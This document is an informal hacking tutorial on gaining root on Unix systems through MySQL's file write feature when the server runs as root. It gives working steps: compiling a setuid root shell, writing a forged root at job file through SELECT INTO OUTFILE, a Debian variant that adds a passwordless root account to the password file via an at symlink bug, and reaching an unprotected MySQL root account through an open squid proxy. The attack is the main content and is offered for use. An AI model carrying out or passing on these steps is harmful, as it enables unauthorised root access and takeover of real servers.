MySQL attack

  • introduction
    mysql is a famous freeware sql server and has the possibilty to read or write files to the system. your user must have the file_privileges set to "Y" in the user table (mysql db). on some distributions mysql is running under root, so that you can write files with root privileges. if you compile mysql yourself and use startup.sh, it will run also with uid 0. the default umask is 111, so the files arent executable. in some cases its important to have executable files. so we have to use a little trick to bypass this "protection" (i.e. debian).
  • affected systems

  • at attack (see myattack.c)
    at is tool to start programs at a certian point. at creates file in a spool directory that will be read by the at daemon or over crontab/atrun. lets have a look at the directories: 
                    	linux                	bsd
-------------------------------------------------------------------- 
directory		/var/spool/cron/atjobs 	/var/at/jobs
queue			a			c,E
jobs need +x flag	yes			no
    at job files are simple bash scripts. they have a few options in the header and their filenames look something like that: 
    a 00001 00fce162
v vvvvv vvvvvvvv
| |     |
| |     + date in minutes (0 will always work)
| |
| + an autoincrement id
|
+ queue
  a ... linux (debian), c ... (default bsd) man at for more details
    lets take a look at the file itself: 
    #!/bin/sh
# atrun uid=[uid] gid=[gid]
# mail [user] 0
...
set some environment variables
...
execute some commands
  • vulnerabilities
    so the idea is to create (not overwrite) a file that will be executed by root (like .bashrc, cronjobs). but in most cases these files already exists. so we need to write another atjob that will be executed over cron. the atd daemon from openbsd executes the files, even if they have not set the +x flag. so on debian we have to use a little trick to exploit this bug.
  • how to exploit it under openbsd
    first you create a famous boomsh.c
    $ cat > /tmp/boomsh.c << EOF
int main() { setuid(0); setgid(0); system("/bin/sh"); }
EOF
$ gcc /tmp/boomsh.c -o /tmp/s
    now create a new atjob file (you can also directly insert it into the table). lets have a look at the file name:
    # ls -al /var/spool/atjobs
-rwx------    1 andi     andi            655 Jul  5 22:39 a0000100fce162

$ cat > /tmp/a000100fce162 << EOF
#!/bin/sh
# atrun uid=0 gid=0
# mail       root 0
chown root.root /tmp/s
chmod 4755 /tmp/s
EOF
    its important to set uid and gid in the second line, else it doesnt work 
    $ mysql -u user -p db
> create table x (y text); 
> load data infile "/home/user/atjob" into table x; 
> select * into outfile "/var/at/jobs/a0735000000000" fields escaped by '' from x;
    we need the "fields escaped by ''" options, so that \n will work. now wait ten minutes and look in the /tmp directory ...
  • how to exploit under debian (linux?)
    as i said before under linux our atjob need to have +x flag set. so we have to exploit the symlink vulnerabilty in at. we create a crontab for the user daemon to open a shell with uid 1. then we read the .seq file and create a file called "a[.seq value + 1]00[now+10]" and then add an at job over the at command and enter the following command: "r00t::0:0:root::/bin/sh".
  • default installation
    after a default installation root can connect from localhost without a password. So if the victim is running squid that allows the connect method you can connect to localhost:3306. Use SQUID NetPipe for it.